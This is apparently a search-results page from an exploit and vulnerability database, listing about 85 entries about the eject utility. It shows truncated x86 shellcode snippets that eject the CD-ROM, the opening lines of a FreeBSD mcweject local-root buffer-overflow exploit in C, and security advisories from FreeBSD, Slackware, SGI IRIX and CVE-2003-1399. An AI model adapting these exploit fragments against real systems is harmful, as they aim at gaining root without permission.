85 matches found
linux/x86 eject /dev/cdrom 42 bytes
No description provided by source. ; linux/x86 eject /dev/cdrom 42 bytes ; root@thegibson ; 2010-01-08 section .text global start start: ; open"/dev/cdrom", ORDONLY | ONONBLOCK; mov al, 5 cdq push edx push word 0x6d6f push dword 0x7264632f push dword 0x7665642f mov ebx, esp mov cx, 0xfff sub cx,...
linux/x86 eject /dev/cdrom 42 bytes
linux/x86 eject /dev/cdrom 42 bytes. Shellcode exploit for linx86 platform ; linux/x86 eject /dev/cdrom 42 bytes ; root@thegibson ; 2010-01-08 section .text global start start: ; open"/dev/cdrom", ORDONLY | ONONBLOCK; mov al, 5 cdq push edx push word 0x6d6f push dword 0x7264632f push dword...
CVE-2003-1399
CVE-2003-1399 relates to eject 2.0.10 installed with setuid on systems like SuSE Linux 7.3. The issue is that error messages vary depending on whether a specific file exists, enabling local users to obtain sensitive information. The consolidated documents confirm the vulnerable component (eject 2...
FreeBSD eject buffer overflow
Buffer overflow in -t option...
FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit
No description provided by source. // ejecsploit.c - local root exploit for bsd's eject.c // harry // vuln found by kokanin you 31337!!! ; // thanks to sacrine and all the other netric guys!!! you rule : include stdio.h include stdlib.h include string.h include unistd.h define LEN 1264 define NOP...
FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Local Privilege Escalation
// ejecsploit.c - local root exploit for bsd's eject.c // harry // vuln found by kokanin you 31337!!! ; // thanks to sacrine and all the other netric guys!!! you rule : include include include include define LEN 1264 define NOP 0x90 extern char environ; int main char bufLEN; char ptr; char arg4;...
FreeBSD mcweject 0.9 Eject - Local Buffer Overflow Local Privilege Escalation
FreeBSD mcweject 0.9 Eject - Local Buffer Overflow Local Privilege Escalation // ejecsploit.c - local root exploit for bsd's eject.c // harry // vuln found by kokanin you 31337!!! ; // thanks to sacrine and all the other netric guys!!! you rule : include include include include define LEN 1264...
[slackware-security] zoo archiver overflow
New bin packages are available for Slackware 10.2 and -current to fix a security issue with the zoo archive program. A non-security- related upgrade to the newest version of "eject" was also done. Here are the details from the Slackware 10.2 ChangeLog: patches/packages/bin-10.2-i486-210.2.tgz:...
linux/x86 eject cd-rom (follows /dev/cdrom symlink) + exit() 40 bytes
Exploit for linux/x86 platform in category shellcode ===================================================================== linux/x86 eject cd-rom follows /dev/cdrom symlink + exit 40 bytes ===================================================================== / linux/x86 eject cd-rom follows...
linux/x86 eject cd-rom (follows /dev/cdrom symlink) + exit() 40 bytes
No description provided by source. / linux/x86 eject cd-rom follows "/dev/cdrom" symlink + exit - 40 bytes - izik [email protected] / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\xb5\x08" // mov $0x8,%ch "\x68\x64\x72\x6f\x6d" // push...
linux/x86 eject/close cd-rom loop (follows /dev/cdrom symlink) 45 bytes
No description provided by source. / linux/x86 eject & close cd-rom frenzy loop follows "/dev/cdrom" symlink - 45 bytes - izik [email protected] / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\xb5\x08" // mov $0x8,%ch...
linux/x86 eject cd-rom follows /dev/cdrom symlink + exit 40 bytes
linux/x86 eject cd-rom follows /dev/cdrom symlink + exit 40 bytes. Shellcode exploit for linx86 platform / linux/x86 eject cd-rom follows "/dev/cdrom" symlink + exit - 40 bytes - izik / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx...
linux/x86 eject/close cd-rom loop (follows /dev/cdrom symlink) 45 bytes
Exploit for linux/x86 platform in category shellcode ======================================================================= linux/x86 eject/close cd-rom loop follows /dev/cdrom symlink 45 bytes ======================================================================= / linux/x86 eject & close cd-r...
linux/x86 eject /dev/cdrom 64 bytes
linux/x86 eject /dev/cdrom 64 bytes. Shellcode exploit for linx86 platform / CDROM EJECTING CODE by lamagra .data .globl main .type main,@function start: setreuid 0, 0 xorl %eax,%eax xorl %ebx,%ebx xorl %ecx,%ecx xorl %edx,%edx movb $70,%al int $0x80 jmp 0x21 popl %esi movb %edx,10%esi leal %esi,...
linux/x86 eject /dev/cdrom 64 bytes
No description provided by source. / CDROM EJECTING CODE by lamagra .data .globl main .type main,@function start: setreuid 0, 0 xorl %eax,%eax xorl %ebx,%ebx xorl %ecx,%ecx xorl %edx,%edx movb $70,%al int $0x80 jmp 0x21 popl %esi movb %edx,10%esi leal %esi, %ebx open"/dev/cdrom",...
eject 2.0.10 vulnerability
Application: eject Version: 2.0.10 Platforms: Linux Distribution: SuSE 7.3, most likely other versions of SuSE Linux as well also all distributions that make eject SUID root Bugs: verbose error messages reveal location of files/directories Risk: low Author: nordi e-mail: [email protected] 1...
Дырка в Eject
Классические переполнения буфера позволяют получение привилегий root...
Ports Security Advisory: FreeBSD-SA-00:49.eject
-----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:49 Security Advisory FreeBSD, Inc. Topic: eject port allows local root exploit Category: ports Module: eject Announced: 2000-09-13 Affects: Ports collection. Corrected:...
FreeBSD-SA-00:49.eject
-----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:49 Security Advisory FreeBSD, Inc. Topic: eject port allows local root exploit Category: ports Module: eject Announced: 2000-09-13 Affects: Ports collection. Corrected:...
PT-1997-1011 · Sgi · Sgi Irix
Name of the Vulnerable Software and Affected Versions: SGI IRIX affected versions not specified Description: The issue allows for root privileges to be obtained via a buffer overflow in the eject command on SGI IRIX systems. Recommendations: At the moment, there is no information about a newer...